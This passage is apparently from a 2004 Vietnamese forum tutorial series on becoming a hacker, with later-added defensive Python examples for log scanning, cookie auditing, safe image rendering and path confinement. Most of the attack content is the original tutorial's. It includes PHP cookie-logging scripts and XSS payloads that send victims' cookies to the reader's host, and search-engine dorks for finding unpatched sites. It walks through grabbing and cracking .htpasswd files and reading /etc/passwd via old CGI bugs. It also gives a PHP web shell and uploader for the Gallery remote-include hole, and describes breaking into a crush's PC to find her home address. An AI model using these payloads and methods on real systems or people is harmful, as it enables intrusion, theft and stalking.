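        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields is None or len(values) != len(fields):
            continue   # header-less or malformed line: skip rather than guess
        yield dict(zip(fields, values))


def findings(text):
    """Return (time, client ip, reason) for every entry matching the pattern."""
    out = []
    for e in parse_w3c(text):
        stem = e.get("cs-uri-stem", "").lower()
        query = unquote(e.get("cs-uri-query", "-"))   # IIS logs "-" for an empty query
        if query == "-":
            query = ""
        name = stem.rsplit("/", 1)[-1]
        reasons = []
        if "/cgi-bin/" in stem and name in SUSPECT_STEMS:
            reasons.append(f"executable {name} under cgi-bin")
        if SUSPECT_QUERY.search(query):
            reasons.append("shell command in query: " + query)
        if reasons:
            out.append((e["date"] + " " + e["time"], e["c-ip"], "; ".join(reasons)))
    return out


def attacker_ips(text):
    """Distinct client addresses with at least one finding."""
    return sorted({ip for _, ip, _ in findings(text)})
```

Because the intruder's last step is to edit these very files, the check only has value if the logs are shipped off the box (or at least copied) before anyone with administrator rights can touch them.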

In part 3 I will cover the Linux OS, how to break through a website's password protection, how to hack a web page in the simplest way, and so on.

End of Part 2

Author: Anhdenday - HVAOnline.net
The most basic things you need to know to become a hacker - Part 3 [12/7/2004 10:33:00 AM]

20.) What is a cookie?

A cookie is a small structured piece of data shared between a website and the user's browser. Cookies are stored as small text files (under 4 KB). Sites create them to store, retrieve and recognise information about the users visiting the site and the areas of the site they pass through.
That information can include the user's name or identifier, password, preferences, habits and so on. The user's browser accepts the cookie and stores it on the local disk; not every browser supports cookies. After one visit to the site the information about the user is kept in the cookie, and on later visits the site can reuse what is in the cookie (for example the details of a forum login) so that the user does not have to log in again or re-enter other details. The problem is that many sites reuse the information stored in cookies carelessly, check it incompletely or protect it with weak encoding, which lets a hacker get past the login door and take control of the site.

_ A cookie usually has the following parts:

+ Name: chosen by the site's programmer.
+ Domain: the domain of the server that created and sent the cookie, and the only domain the browser will send it back to.
+ Path: the part of the site's URL space the cookie applies to.
+ Expiry date: the moment the cookie stops being valid; without one the cookie lasts only until the browser is closed.
+ Secure: if this flag is set, the browser only sends the cookie over an encrypted (HTTPS) connection between server and browser; the flag does not encrypt the cookie itself.
+ Other values: application-specific data the web server stores to identify you later; these values may not contain spaces, semicolons or commas and are limited to about 4 KB in total.
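The attributes listed above are what an auditor checks in each Set-Cookie header a site sends. The linter below is an added example for this section, not code from the original article: it splits a Set-Cookie header into name, value and attributes and flags the weaknesses that matter for the attacks in the next section, namely a missing Secure flag (the cookie also travels over plain HTTP), a session or login cookie without HttpOnly (readable through document.cookie), a session cookie made persistent with an expiry date, and a cookie over the 4 KB limit. The headers are constructed, not captured from a real site.

```python
"""Parse Set-Cookie headers and flag the attribute weaknesses discussed above.

Added example; the headers are constructed, not captured from a real site.
"""
from dataclasses import dataclass, field

CONSTRUCTED_HEADERS = [
    "PHPSESSID=abc123def456; Path=/",
    "prefs=lang%3Den; Path=/; Expires=Wed, 21 Oct 2026 07:28:00 GMT",
    "auth=eyJ1c2VyIjoiZ3JhaGFtIn0; Path=/; Secure; HttpOnly; SameSite=Lax",
    "login_token=" + "A" * 5000 + "; Path=/; Secure; HttpOnly",
]

SENSITIVE_HINTS = ("sess", "auth", "token", "login", "pass")   # names that usually carry a session
MAX_COOKIE_BYTES = 4096


@dataclass
class Cookie:
    name: str
    value: str
    attrs: dict = field(default_factory=dict)   # lower-cased attribute name -> value or True


def parse_set_cookie(header: str) -> Cookie:
    """Split 'name=value; Attr; Attr=value' into its parts (splitting on the first '=' only)."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        if not p:
            continue
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip() if v else True
    return Cookie(name.strip(), value, attrs)


def lint(cookie: Cookie) -> list[str]:
    """Return short problem codes for one cookie."""
    problems = []
    sensitive = any(h in cookie.name.lower() for h in SENSITIVE_HINTS)
    if "secure" not in cookie.attrs:
        problems.append("missing-secure")        # sent over plain HTTP as well
    if sensitive and "httponly" not in cookie.attrs:
        problems.append("missing-httponly")      # readable through document.cookie
    if sensitive and ("expires" in cookie.attrs or "max-age" in cookie.attrs):
        problems.append("persistent-session")    # survives the browser being closed
    if len(cookie.name) + 1 + len(cookie.value) > MAX_COOKIE_BYTES:
        problems.append("oversize")              # browsers drop cookies above ~4 KB
    return problems


def lint_all(headers: list[str]) -> dict[str, list[str]]:
    """Problem codes per cookie name for a list of Set-Cookie headers."""
    return {c.name: lint(c) for c in map(parse_set_cookie, headers)}
```

Of the four codes, missing-httponly on a session cookie is the one the next section exploits: with HttpOnly set, document.cookie simply does not contain the cookie, and the injected image tag has nothing to send.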

(Viethacker.net material)

21.) Stealing a victim's cookie:

_ First open Notepad and paste the following code into it:

CODE
<?php
define("LINE", "\r\n");
define("HTML_LINE", "<br>\r\n");   // line break for the on-screen copy

// Print and collect every key/value pair of $arr under a title.
function getvars($arr, $title)
{
    $res = "";
    $len = count($arr);
    if ($len > 0)
    {
        if (strlen($title) > 0)
        {
            print("[--------$title--------]" . HTML_LINE);
            $res .= "[--------$title--------]" . LINE;
        }
        foreach ($arr as $key => $value)
        {
            print("[$key]" . HTML_LINE);
            print($arr[$key] . HTML_LINE);
            $res .= "[$key]" . LINE . $arr[$key] . LINE;
        }
    }
    return $res;
}
// get current date
$now = date("Y-m-d H:i:s");
// init
$myData = "[-----$now-----]" . LINE;
// get: everything passed in the query string (a stolen document.cookie arrives here)
$myData .= getvars($_GET, "");
// file: one log file per visiting IP address
$file = $_SERVER['REMOTE_ADDR'] . ".txt";
$mode = "r+";
if (!file_exists($file))
    $mode = "w+";
$fp = fopen($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>

or

CODE
<?php
if ($contents && $header) {
    mail("victim@yahoo.com", "from mail script", $contents, $header) or die("couldnt email it");
    sleep(2);
?>
<script language=javascript>
</script>
<?php
} else {
    echo "nope";
}
?>

(Change victim@yahoo.com to your own email address.)

Save the Notepad file as <any name>.php (the .php extension is required) and upload it to a host that supports PHP; in my example it is abc.php (if you have built websites before this is easy, right?). This script records information about the victim (sometimes including their cookie) whenever they open content that carries it, and saves it automatically to a file named <victim's ip>.txt.
_ There is another way to get cookies, used on forums that have a bug that has not yet been fixed: when you post, you just add the following code to your post:

CODE
document.write(` `)

where host_php is the address you uploaded the cookie-stealing file to, and abc.php is my example file.
_ For example, applied in an img tag, it looks like this:

CODE
`)\">

or:

CODE
[img]javascript:document.write('&#x3cimg src=http://host_php/docs.php?docs='+escape(document.cookie)+'&#x3e')">

The idea is the same in each case: the forum turns the [img] tag into an HTML image whose URL is a javascript: URL, that script writes an <img> whose src points at your PHP file, and the victim's browser sends its document.cookie to that file in the query string.
_ You can find sites to practise this on by searching google.com for forums with this bug, using the keywords "Powered by .. forum" with these forums: ikonboard, Ultimate Bulletin Board, vBulletin Board, Snitz. If you are lucky you may find a forum that has not fixed this bug to practise on; if you find one, share it with everyone.
_ There are many other good cookie-stealing scripts; look for them yourselves.
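The forum bug behind all three payloads is the same: the [img] tag's URL is pasted into an HTML attribute unchanged, so a javascript: URL, an entity-encoded scheme or a quote that breaks out of the attribute all execute. The following is an added example, not code from the original article or from any of the forums it names: it shows the vulnerable rendering beside a safe one that normalises the URL the way browsers do (entity decoding, stripping control characters), allows only http and https URLs with a host, and HTML-escapes what it emits. PAYLOAD is the article's third payload, used here as a constructed test input.

```python
"""Render a forum [img] tag safely: the fix for the cookie-theft payloads above.

Added example, not code from any of the forums named in the article.
"""
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# The payload from the article, as a constructed test input.
PAYLOAD = ("javascript:document.write('&#x3cimg src=http://host_php/docs.php?docs='"
           "+escape(document.cookie)+'&#x3e')")


def render_img_vulnerable(url: str) -> str:
    """What the buggy forums effectively did: paste the URL straight into HTML."""
    return '<img src="' + url + '">'


def normalize(url: str) -> str:
    """Undo the tricks browsers tolerate before judging the scheme."""
    url = html.unescape(url)                                 # &#x6a;avascript: -> javascript:
    url = "".join(ch for ch in url if ord(ch) >= 0x20)       # drop tabs/newlines/NULs browsers ignore
    return url.strip()                                       # leading blanks are ignored too


def render_img_safe(url: str) -> str:
    """Only http(s) URLs with a host become images; everything else stays literal text."""
    clean = normalize(url)
    parts = urlsplit(clean)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return html.escape(f"[img]{url}[/img]")              # show the tag, never execute it
    return '<img src="%s">' % html.escape(clean, quote=True)  # quote=True closes the attribute-breakout


if __name__ == "__main__":
    print(render_img_vulnerable(PAYLOAD))
    print(render_img_safe(PAYLOAD))
    print(render_img_safe("http://example.com/x.png"))
```

Validating after normalisation matters more than the escaping: html.escape alone would leave the javascript: scheme intact, and a scheme check without entity decoding is defeated by the &#x6a;avascript: spelling.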

22.) Breaking a website's password protection:

_ When you browse a website looking for information, some areas stop you with a box asking for a password. That is a private area holding confidential information reserved for a certain person or group (for example the place where viethacker.net keeps its hacking know-how, which the e-Chip magazine wrote about). When you click such a link, the web server (usually Apache) consults two files, .htaccess and .htpasswd; .htaccess sits in the protected directory itself. Why the leading dot in the name .htaccess? Files whose names begin with a dot are treated by web servers as configuration files, and they are hidden when you list the directory protected by the .htaccess file. These two files control access to the protected link you want to get into: .htaccess holds the directives that tell the server the directory requires a login (and where the user file is), and .htpasswd holds the user names and their hashed passwords. Only when you enter a matching pair does the link open. Look at this example .htpasswd:

CODE
Graham:F#.DG*m38d%RF
Webmaster:GJA54j.3g9#$@f

You can read the user names, but can you make anything of the passwords? Of course not. Do you understand why you cannot read them? The second field is a one-way hash of the password, not the password itself, so even holding the file does not hand you the passwords. And because the two files sit together in the same directory, and the server refuses to serve .ht* files from a directory it protects, there is no point trying to break in and crack that damned hash (not until you have password cracking down, anyway. I am still looking into getting in directly; if I succeed I will post it.) Back on track: what happens if the .htpasswd file is outside the directory protected by .htaccess, but still somewhere the web server will serve? Then we can grab it easily. Look at this example link:

http://www.company.com/cgi-bin/protected/

To check whether the .htpasswd file is protected by .htaccess, request this URL:

http://www.company.com/cgi-bin/protected/.htpasswd

If the answer is "File not found" or similar, the file is not being served from that directory (a "Forbidden" answer would mean the server is blocking .ht* files, which is its default), so look for it with one of the following URLs:

http://www.company.com/.htpasswd
http://www.company.com/cgi-bin/.htpasswd
http://www.company.com/cgi-bin/passwords/.htpasswd
http://www.company.com/cgi-bin/passwd/.htpasswd

If you still do not see it, keep trying similar URLs (it may sit right in the document root) until you find it.
Once you have the file, run "John the Ripper" or "Crackerjack" on it to crack the passwords it holds. You know what comes next: take a valid user name and password, log in and see what those guys are hiding in there, but do not change their passwords or mess with them.
You can also use this to get an admin password, because most members of a closed group are people with rank and privileges.
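Two things in this section are worth making precise: what the hash field of an .htpasswd line actually is, and whether the file is reachable by URL at all. The block below is an added example for this section, not code from the original article. It parses an .htpasswd file, names the hash scheme htpasswd(1) used for each entry, verifies a {SHA} entry the way the server does (base64 of an unsalted SHA-1, compared in constant time), and checks whether a given AuthUserFile path lies under the document root, which is the whole difference between the protected and unprotected cases above. SAMPLE_HTPASSWD is constructed (the {SHA} entry is the hash of the word "password") and the paths are hypothetical.

```python
"""Read an .htpasswd file, identify each hash scheme, verify a {SHA} entry, and
check whether the AuthUserFile sits inside the document root.

Added example; SAMPLE_HTPASSWD is constructed (the {SHA} entry is the hash of
the word "password"), and the paths are hypothetical.
"""
import base64
import hashlib
import hmac
import os

SAMPLE_HTPASSWD = """\
graham:{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
webmaster:$apr1$r31.....$HqJZimcKQFAMYayBlzkrA/
anon:$2y$05$abcdefghijklmnopqrstuuAbCdEfGhIjKlMnOpQrStUvWxYz01234
legacy:ab9/ckdqMfZbk
"""


def parse_htpasswd(text: str) -> dict[str, str]:
    """user -> hash field; blank and comment lines are skipped."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, sep, h = line.partition(":")
        if sep:
            users[user] = h
    return users


def scheme(h: str) -> str:
    """Recognise the formats htpasswd(1) writes."""
    if h.startswith("{SHA}"):
        return "sha1"                 # base64(SHA-1(password)), unsalted: fast to crack
    if h.startswith("$apr1$"):
        return "apr1-md5"             # Apache's salted, iterated MD5
    if h.startswith(("$2y$", "$2a$", "$2b$")):
        return "bcrypt"
    if len(h) == 13:
        return "crypt"                # classic DES crypt: only the first 8 chars count
    return "plain-or-unknown"


def verify_sha(h: str, password: str) -> bool:
    """Check a {SHA} entry; constant-time compare so timing does not leak."""
    digest = base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()
    return hmac.compare_digest("{SHA}" + digest, h)


def served_by_webserver(document_root: str, auth_user_file: str) -> bool:
    """True when the password file lies under the document root, i.e. a URL can reach it."""
    root = os.path.realpath(document_root)
    target = os.path.realpath(auth_user_file)
    return os.path.commonpath([root, target]) == root


if __name__ == "__main__":
    for user, h in parse_htpasswd(SAMPLE_HTPASSWD).items():
        print(f"{user:10} {scheme(h)}")
    print(served_by_webserver("/var/www/html", "/var/www/html/cgi-bin/protected/.htpasswd"))
    print(served_by_webserver("/var/www/html", "/etc/apache2/.htpasswd"))
```

The fix the check points at is simple: keep AuthUserFile outside DocumentRoot (served_by_webserver returning False), and leave Apache's default `<Files ".ht*"> Require all denied` block in place so that even a misplaced copy answers 403 rather than handing out the hashes.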

23.) About CGI:

_ CGI stands for Common Gateway Interface. Most websites run CGI programs (called CGI scripts) to do the work that has to be done around the clock. CGI scripts are programs written and uploaded to the site, mostly in Perl, C, C++ or VBScript; Perl is the favourite because it is easy to write, takes little space and, above all, can run 24 hours a day.
_ CGI scripts are usually kept in the /cgi-bin/ directory of the site, as in this example:

http://www.company.com/cgi-bin/login.cgi

They do jobs such as:
+ counting visitors;
+ deciding what visitors may and may not do on your site;
+ managing members' user names and passwords;
+ providing mail services;
+ providing link pages and passing messages between members;
+ producing detailed error messages, and so on.

24.) The most basic way to hack a website through CGI scripts:

_ Bug 1: nph-test-cgi

+ Type the address of the vulnerable site into your browser.
+ Add the following to the end: /cgi-bin/nph-test-cgi
+ The URL now looks like this:

http://www.servername.com/cgi-bin/nph-test-cgi

+ If it works you see a listing of the directories on the server. To list a particular directory, add:

CODE
?/*

+ The password file is usually kept in /etc, so type this URL:

http://www.servername.com/cgi-bin/nph-test-cgi?/etc/*

(nph-test-cgi was a sample script shipped with early Apache and NCSA servers; it echoed the query string through the shell unquoted, so the shell expanded the "*" into a directory listing.)

_ Bug 2: php.cgi

+ As above, just enter the following URL to get the password file:

http://www.servername.com/cgi-bin/php.cgi?/etc/passwd

(The old PHP/FI CGI binary, when run directly, took the path in the query string as the file to process and displayed it.)

The important point is that these are old bugs, so finding sites to practise on is hard. Go to google.com and search for:

/cgi-bin/php.cgi?/etc/passwd
or cgi-bin/nph-test-cgi?/etc

then check the results for sites that have not fixed the bug and practise there.
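Both bugs above come down to a CGI program handing a user-controlled string to the file system or the shell unchecked. The following is an added example for sections 23 and 24, not code from the original article or from PHP/FI: a file-serving helper in the shape of the php.cgi bug, shown beside the confined version a CGI script should use. The safe version decodes the parameter once, rejects absolute paths and NUL bytes, resolves the result and proves it still lies under the base directory, so "?/etc/passwd" and encoded "../" sequences are refused. BASE is a hypothetical document directory; it does not need to exist for the path arithmetic to work.

```python
"""Confine a user-supplied file path to a base directory: the fix for the
php.cgi-style "?/etc/passwd" bug above.

Added example; BASE is a hypothetical document directory (it need not exist
for the path arithmetic to work).
"""
import os
from urllib.parse import unquote

BASE = "/srv/www/docs"


def resolve_vulnerable(base: str, user_path: str) -> str:
    """The bug: joining an absolute path discards the base entirely, and '..' walks out of it."""
    return os.path.join(base, unquote(user_path))


def resolve_safe(base: str, user_path: str) -> str:
    """Decode once, forbid absolute paths and NULs, then prove the result stays under base."""
    decoded = unquote(user_path)                     # one decode: "%2e%2e" becomes "..", "%252e" stays literal
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")          # would truncate the name in a C runtime
    if decoded.startswith(("/", "\\")) or (len(decoded) > 1 and decoded[1] == ":"):
        raise ValueError("absolute path not allowed")
    root = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(root, decoded))   # collapses any ../ sequences
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes base directory")
    return candidate


def is_confined(base: str, user_path: str) -> bool:
    """Convenience wrapper: does resolve_safe accept this request?"""
    try:
        resolve_safe(base, user_path)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for p in ["manual/index.html", "/etc/passwd", "..%2F..%2F..%2Fetc%2Fpasswd"]:
        print(f"{p:32} vulnerable -> {resolve_vulnerable(BASE, p)}")
        print(f"{'':32} safe       -> {'rejected' if not is_confined(BASE, p) else resolve_safe(BASE, p)}")
```

The commonpath check after realpath is the part that actually matters: filtering the string for ".." alone misses encodings and symlinks, whereas comparing the resolved path against the resolved base catches every way of leaving the directory at once.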

25.) Breaking into a computer that is online:

_ Breaking into an online computer is both easy and hard. It is easy if you use the tool ENT 3, but its drawbacks are that the victim's machine slows down noticeably, that it cannot get into machines that share nothing, and that if the victim switches off you are cut short before you have taken an account. A quieter way, with less slowdown, which can also work when the victim shares nothing, is to use the built-in DOS commands. OK, let's begin:
_ Use an IP scanner such as ENT 3 to scan for the target IP.
_ Go to Start -> Run and type cmd.
_ In the DOS window type the net view command:

CODE
+ Example: c:\> net view \\203.162.30.xx

_ Look at the result. If it has shares, it is easy: just type

net use <any free drive letter on your machine>: \\<victim's share>

+ Example: c:\> net use E: \\203.162.30.xx\C

_ If connecting to the victim's machine asks for a password, download a password-guessing program (I suggest pqwak2 for guessing share passwords on Win98 or WinMe machines, and xIntruder for Windows NT). Both are used in the same way: on the first line enter the victim's IP, on the second the name of the victim's shared drive; for xIntruder also set a sensible delay, about 100 on a LAN and around 5000 over the Internet.
_ If the victim's machine has no shares, type:

net use <any free drive letter on your machine>: \\<ip>\c$ (or d$) /user:administrator

+ Example: net use E: \\203.162.30.xx\C$ /user:administrator

The c$ share is an administrative share present by default on every NT machine, reachable with the "administrator" user; you are prompted for that account's password, so this only works if it is blank or you know it.
_ You can use this method to get into the machine of a girl you secretly admire and look for data that reveals her address (provided she is using her home machine and you are lucky enough to find the address). Just chat with her on Yahoo Messenger and, in DOS, type:

c:\> netstat -n

Close every other window while you do this, keeping only the Yahoo Messenger chat window with her open, so that her IP address is easier to pick out. Then use the intrusion method described above. (Our friend tykhung probably used this way back when he was courting a distant girl over the net, to break in and find out her address.)
You will succeed if the victim's machine has no firewall or proxy.

====================================================

Many of you have asked me to give exact addresses for you to practice on, but I cannot, because I learned my lesson from tutorials that gave exact addresses: once you finished practising and got admin rights, you deleted their database. HVA would then get a reputation as the source of destruction on the network. Please understand; where possible I will only describe the ways to find vulnerable addresses, not give any specific address.

====================================================

In part 4 I will cover how to protect your computer from intrusion while you are online, an overview of the steps taken when we decide to hack a Web site, how to find vulnerable Web sites to practice on, hacking the Web through the Gallery bug, etc.

GOOD LUCK!!!!!!!!!
The most basic things to know to become a Hacker - Part 4 [12/7/2004 10:37:00 AM]

26.) About RPC (Remote Procedure Call):

_ Windows NT provides the ability to use RPC to run distributed applications. Microsoft RPC includes the libraries and services that let distributed applications work in a Windows NT environment. A distributed application consists of several processes that each carry out a specific task. These processes may run on one or on several computers.

_ Microsoft RPC uses a name service provider to locate servers on the network. The Microsoft RPC name service provider must conform to the Microsoft RPC name service interface (NSI). The NSI includes API functions that give access to several entities in the same name service database (the name service database holds the entries, entry groups and entry history on the server).
When Windows NT is installed, Microsoft Locator is automatically selected as the name service provider. It is the optimal name service provider in a Windows NT network environment.

27.) A simple technique for protecting yourself against unauthorised intrusion while online, via RPC (Remote Procedure Call):

_ If you suspect that someone is inside your machine, or that an admin is watching you through remote desktop, just turn off the Remote Procedure Call function; then no program can remote-desktop in to watch you. It also blocks most intrusion tools (since most of these tools connect over remote procedure call (over tcp/ip)). Most trojans also rely on this protocol.

How to turn it off: go to Services / Remote Procedure Call (right click), set Startup type to Disabled or Manual, then Apply.

This is a very effective protection for a PC; combined with turning off file sharing you become very hard to hack), but on a LAN it will cause you quite a lot of trouble, because you will not be able to run programs that depend on this service. Choose whatever fits the way you work. In my opinion, on a LAN installing a firewall already makes you fairly safe.

(Based on an article by brother khoaimi, admin of HVA)

28.) The steps for hacking a web site today:

_ According to the list in the book Hacking Exposed 3, hacking a Web site normally goes through these steps:
+ FootPrinting:
This is what a hacker does to gather as much information as possible about the server/business/user. It includes details such as IP addresses, Whois, DNS, etc., and sometimes official information related to the target. Often the hacker only needs to use the search engines on the network to find this information.
+ Scanning:
Once the information is in hand, the next step is to evaluate and identify the services the target offers. This includes port scanning, OS identification, etc. Tools used here include nmap, WS pingPro, siphon, fscan and many others.
+ Enumeration:
The third step is to look for poorly protected resources or user accounts that can be used to get in. This covers default passwords, default scripts and default services. Very many network administrators do not know about these values, or never change them.
+ Gaining Access:
Now the intruder tries to get access to the network using the information gathered in the three steps above. The methods used here may be attacks on buffer overflow bugs, grabbing and decrypting the password file, or the crudest of all, brute force (trying every possibility) on the password. Tools commonly used at this step are NAT, podium, or L0pht.
+ Escalating Privileges:
For example, if the hacker got into the network with a guest account, they will try to take control of the whole system. The hacker will try to crack the admin's password, or use a privilege escalation hole. John the Ripper is a password-cracking program that is used very often.
+ Pilfering (used when the files holding passwords are exposed):
Once again the search engines are used to find ways of getting into the network. Text files containing passwords or other insecure mechanisms can be easy prey for the hacker.
+ Covering Tracks:
After getting the information they need, the hacker tries to erase their traces, deleting the operating system's log files so that the administrator does not realise the system was compromised, or, if they do, cannot find out who the intruder was.
+ Creating "Back Doors" (preparing an easier way in next time):
The hacker leaves "Back Doors", i.e. a mechanism that lets them come back by a secret path without much effort, by installing a Trojan or creating a new user (in organisations with many users). The tools here are Trojans and keyloggers.
+ Denial of Service (DoS):
If the intrusion does not succeed, DoS is the last means of attacking the system. If the system is not configured properly, it will break and let the hacker in. Or, in other cases, DoS simply makes the system stop working. Tools often used for DoS attacks are trin00, Ping of Death, teardrop, and various nukers and flooders. This method is very dangerous and is still widely used today.
_ Depending on their understanding and skill, a hacker may skip certain steps. The order does not have to be followed. Remember the saying: know your enemy and know yourself, and you will win a hundred battles out of a hundred.

(Material from HVA and hackervn.net)

29.) How to find vulnerable Websites:

_ You surely know the Web sites dedicated to searching for information on the network? But you probably did not expect that we can use those sites to find vulnerable Web pages (I usually use google.com, and I recommend it to you as well because it is very powerful and effective).
_ If you are interested in Web page bugs and want to find them, just go to google.com and type the vulnerable fragment after allinurl:. E.g. we have this vulnerable URL fragment:

cgi-bin/php.cgi?/etc/passwd

you would type:

allinurl:cgi-bin/php.cgi?/etc/passwd

It will list the Web pages affected by this bug; look at the bottom of each listed result (the green address line): if a line reads exactly like the keyword you entered, that page is or was vulnerable. Whether you can get in also depends on whether the site has fixed the bug yet.
_ If you are interested in forum bugs and want to find a forum of that kind to practice on, just enter the keyword

powered by

E.g. to find forums running Snitz 2000:

powered by Snitz 2000

_ However, finding the right forum or vulnerable Web site this way has a low hit rate; pay attention to the special string in the URL that is characteristic of each kind of Web site or forum (this is very important, look into it further yourselves). E.g. to search for the Hosting Controller bug, the characteristic fragment is

"/admin or /advadmin or /hosting"

so type the keyword:

allinurl:/advadmin
or allinurl:/admin
or allinurl:/hosting

It will list the Web sites whose URL looks like:

http://tentrangweb.com/advadmin
or http://tentrangweb.com/admin
or http://tentrangweb.com/hosting

E.g. UBB forums have the characteristic fragment

"cgi-bin/ultimatebb.cgi?"

We search for them the same way as above.
Once you know how to search like this, from now on you only need to follow the updates on HVA's Security Bugs board, which LeonHart posts every day, and you will understand what they mean and be able to check for yourselves.

30.) Hacking the Web through the Gallery bug (a form of the php code injection bug):

_ Gallery is a tool for creating a photo gallery on the web, written in PHP; through this hole we can add our own PHP code that lets us upload, which is our main goal.
_ First register a free host; best is to register at brinkster.com because it is easy. Then open notepad and create a PHP file with the following code:

CODE
<?php
global $PHP_SELF;
echo "
<form method=post action=$PHP_SELF?$QUERY_STRING>
<input type=text name=shell size=40>
<input type=hidden name=act value=shell>
<input type=submit value=Go name=sm>
";
set_magic_quotes_runtime(1);
// $act and $shell arrive from the form as globals (register_globals)
if ($act == "shell") {
    echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
    system($shell);
    echo "
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
}
echo " ";
?>


Save this code as 2 files with different names (but the same code), called:
+ shellphp.php: this file is used to run a shell on the victim host.
+ init.php: this file is uploaded to the page on the host you just created. (Upload this init.php early; we will need it again, but with different code; if you forget to upload this file you're done for.)

Create another PHP file with the following code:

CODE
<?php
function handleupload() {
    if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {
        $filename = $_FILES['userfile']['tmp_name'];
        print "$filename was uploaded successfully";
        $realname = $_FILES['userfile']['name'];
        print "realname is $realname\n";
        print "copying file to uploads dir ".$realname;
        copy($_FILES['userfile']['tmp_name'], *PATH*.$realname); // note *PATH*, we will change it later
    } else {
        echo "Possible file upload attack: filename".$_FILES['userfile']['name'].".";
    }
}
if ($act == "upload") {
    handleupload();
}
echo "
<form ENCTYPE=multipart/form-data method=post action=$PHP_SELF?$QUERY_STRING>
File:<INPUT TYPE=FILE NAME=userfile SIZE=35>
<input type=hidden name=MAX_FILE_SIZE value=1000000>
<input type=hidden name=act value=upload>
<input type=submit value=Upload name=sm>

";
?>


Name it upload.php; it will be used for uploading to the victim's Web site.
_ Next go to Google, type "Powered by gallery" and press enter; Google will list a heap of sites using Gallery. Pick any site and use the following link to check whether it still has the Gallery bug:

http://<victim's Web site>/gallery/captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/ /

If you see a rectangle at the very top, with a button labelled Go to its right, you have found your target. Now you can type commands through that rectangle to hack the victim's Web site.
First type the command pwd to find the absolute path of the current directory and press Go; when the result appears, quickly write down the path shown underneath (in my example the path I found was /home/abc/xyz/gallery).
Then type the command ls -al to list its subdirectories. Now look at the result; you will see a heap of subdirectories listed. Always remember that our goal is to find a directory where we can upload the upload.php file we prepared earlier, so pick the right one by looking at the last word of each result line:
+ Rule out the entries named . or .., because these are the root or virtual directories (they are usually at the top of the result lines).
+ Also rule out lines whose last word has an extension (e.g. config.php, check.inc, etc.), because these are files, not directories.
+ What remains are directories you could upload to, but I advise you to choose lines where the directory's count is greater than 1 (you can read it in the 2nd column from the left), because that both makes sure it is a real directory and not a virtual one, and makes it harder for the site's admin to notice when we plant our file. In my example I found the directory loveyou, containing 12 files, that we can upload to; so the actual path we upload to is:

/home/abc/xyz/gallery/loveyou

Now go into your hosting account and edit init.php so that it has the same code as upload.php, but change *PATH* to /home/abc/xyz/gallery/loveyou/. At the same time prepare an upload.php on your own machine with *PATH* set to "" (two double quotes).
Now we can upload upload.php to the victim's Web site; enter the following address in your browser:

http://<victim's Web site>/gallery/captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/ /

You will see another rectangle appear with 2 buttons beside it, one Browse and one Upload. Use the Browse button to point at the upload.php you prepared on your machine; when you click Upload it will upload upload.php to the victim's Web site. OK, now you have basically completed the hack. From here on, use it to attack further, e.g. grab the database and passwords (the same way as in the previous hacking tutorials), but you should only practice; do not delete their database or deface their Web site. If you are a genuine hacker, it is enough to upload a page saying: Hacked by .. and leave it at that.
As before, whether you succeed or not depends on your luck and on persistent study and applying your knowledge.

(Based on the hacking guide by brother vnofear of viethacker.net)


GOOD LUCK!!!!!!!!!!!!

(End of part 4)
Anhdenday
HVAonline.net
The most basic things to know to become a Hacker - Part 5 [12/22/2004 9:57:00 AM]

31.) What is a TCP/IP packet?

TCP/IP stands for Transmission Control Protocol and Internet Protocol. A TCP/IP packet is a block of data that is compressed, then has a header attached, and is sent to another computer. This is how the internet transmits information: by sending packets. The header of a packet contains the IP address of the sender. You can rewrite a packet and make it look as if it came from someone else!! You can use this to try to get into many systems without being caught. You will need to run Linux, or have a program that lets you do this.


32.) What is Linux:

_ Strictly speaking, Linux is the kernel of an OS. The kernel is the piece of software that handles communication between application programs and the hardware, providing functions such as file management, virtual memory management, and the I/O devices such as ports, screen, keyboard, .... But the Linux kernel is not yet an OS, so it has to be combined with the application programs written by the GNU organisation to form a complete OS: the Linux OS. That is also why we see GNU/Linux whenever Linux is mentioned.
Next, a company or organisation takes these products (the kernel and the application programs), adjusts some of the configuration to give it the company's or organisation's own character, and adds an installation process to the Linux set, and we get a Distribution. Distributions differ in the number and kind of software packaged, in the installation process and in the kernel version. Some major Linux distributions today are: Debian, Redhat, Mandrake, Slackware, Suse.

33.) Basic commands to know when using or breaking into a Linux system:

_ The "man" command: when you want to know how to use some command, use this one:
Syntax: $ man <command>
Example: $ man man
_ The "uname" command: gives basic information about the system
Example: $ uname -a ; it prints something like:

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ The id command: shows the current uid/gid (current user and group)

_ The w command: shows which users are logged in and what they are doing on the system.
Example: $ w prints something like:

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ The ps command: shows information about the processes on the system
Example: $ ps axuw
_ The cd command: to move to some directory, remember this command.
Example: $ cd /usr/bin --> takes you to the bin directory
_ The mkdir command: create a directory.
Example: $ mkdir /home/convit --> creates the directory convit in /home
_ The rmdir command: remove a directory
Example: $ rmdir /home/conga --> removes the directory conga in /home.
_ The ls command: list the contents of a directory
Example: $ ls -laR /
_ The printf command: print formatted data, like printf() in C++.
Example: $ printf %s "\x41\x41\x41\x41"
_ The pwd command: print the current directory
Example: $ pwd --> tells us where we are at the moment: /home/level1
